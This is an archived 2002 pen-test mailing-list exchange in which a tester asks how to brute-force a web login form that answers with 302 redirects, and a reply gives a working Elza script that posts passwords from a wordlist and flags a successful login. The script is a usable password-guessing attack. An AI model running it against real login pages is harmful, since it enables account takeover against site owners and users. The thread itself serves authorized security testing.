RE: Password HTML form bruteforce

From: Greg (greg@hoobie.net)
Date: 04/20/02


From: "Greg" <greg@hoobie.net>
To: "joh ket" <johket@hotmail.com>, <pen-test@securityfocus.com>
Date: Sat, 20 Apr 2002 02:05:16 +0100

I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if you ask
me.

Why don't you try Elza (http://online.securityfocus.com/tools/1127) with
this script which is based on one found in the Elza docs. Obviously change
the target url and username. This script will read each string from
words.txt and submit each attempt checking for the

        var autoredir = on
        subst ACCOUNT = admin

        proc POSITIVEAUTH
           print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
        endproc POSITIVEAUTH

        proc ATTEMPTAUTH
           field userid = USERSTRING
           field password = PASSSTRING
           # Add any other form fields that need to be sent here
           post url http://TargetAddress/Login.cfm
           call POSITIVEAUTH if body = Some warm glowing message about how you're
logged in now.
        endproc ATTEMPTAUTH

        call ATTEMPTAUTH PASSSTRING % words.txt

In the above script, if you set 'autoredir' to off you will not be
automatically redirected by the 302 and the '%location%' variable will be
made available to you for examination. It might be easier to just let Elza
handle the redirection and then match some known test in the body of the
successful authentication page as shown above.

Read the docs for Elza, you'll need to build a list of scripts up before it
become really useful.

cheers

Greg

> -----Original Message-----
> From: joh ket [mailto:johket@hotmail.com]
> Sent: 18 April 2002 10:16
> To: pen-test@securityfocus.com
> Subject: Password HTML form bruteforce
>
>
>
>
> Hi there,
>
> I am currently involved in a pen test on a website
> which is using formbased authentication.
>
> I figured out that a account, named 'test' exists...
> (...)
>
> Now I want to brute force this account, I am using
> Brutus AET2 for this.
>
> But I do not know how to use the HTML response.
>
> Below the packet capture of a response of a login
> which was succesfull:
>
> HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> (lines deleted)
> <head><title>Document.Moved</title></head><body
> ><h1>Object.Moved</h1>
> This.document.may.be.found.<a.HREF="start.cfm?
> cid=
> (lines deleted)
>
> A capture of an unsuccessfull capture looks like this:
>
> HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> login=Invalid password. Please try again
> (lines deleted)
> Document.Moved</title></head>.<body><h1>Object.
> Moved</h1>This.document.may.be.found.<a.HREF="
> original.cfm?login=Invalid password. Please try
> again">here</a>
>
> So depending on the password I get redirected to a
> page...
>
> How should the primary and the secondary repsonse
> be configured?
>
> Or does somebody else have a better idea how to do
> this?
>
> Thanks in advance!
>
> Joh Ket
>
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus Security Intelligence
> Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities
> please see:
> https://alerts.securityfocus.com/
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



Relevant Pages

  • Re: Determining Trojans, File & Print Sharing, Services running remotely on W2K
    ... I wrote a script that does most of this - it's very easy to customize to ... >This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: One Big Review, One Small Script?
    ... One Big Review, One Small Script? ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: wanted: a script to try dictionary attacks against NOTES ID files
    ... Subject: wanted: a script to try dictionary attacks against NOTES ID files ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • One Big Review, One Small Script?
    ... One Big Review, One Small Script? ... if I perform a network vulnerability ... assessment, I run multiple tools (nmap, iss, nessus, ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Scripting-language for interacting with World Wide Web?
    ... work on 'elza' stopped ages ago. ... The script could be run by cron. ... of the site requires log-in. ... *Automatically downloading a range of messages from various Yahoo-groups ...
    (comp.os.linux.misc)